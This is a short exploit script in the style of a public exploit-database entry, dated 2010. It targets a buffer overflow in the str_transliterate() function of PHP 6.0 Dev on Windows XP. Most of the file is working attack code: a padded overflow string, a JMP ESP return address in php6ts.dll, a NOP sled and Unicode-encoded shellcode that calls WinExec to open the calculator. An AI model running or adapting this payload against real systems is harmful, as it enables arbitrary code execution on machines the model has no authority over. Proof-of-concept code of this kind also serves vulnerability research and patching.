# Exploit Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# Date: 2010-04-04
# Author: Pr0T3cT10n
# Software Link: http://downloads.sourceforge.net/project/wampserver/WampServer%202%20-%20Extensions/PHP/WampServer2-PHP6.0dev.exe?use_mirror=garr
# Version: 6.0 Dev
# Tested on: WIN XP HEB SP3
# CVE: no.
# Code:
<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
 $buff = str_repeat("\u4141", 256);
 $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
 $nops = str_repeat("\u9090", 20);

 # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
 $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";

 $exploit = $buff.$eip.$nops.$shellcode;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!\r\n");
}

function ini_get_bool($a) {
 $b = ini_get($a);
 switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
 }
}
?>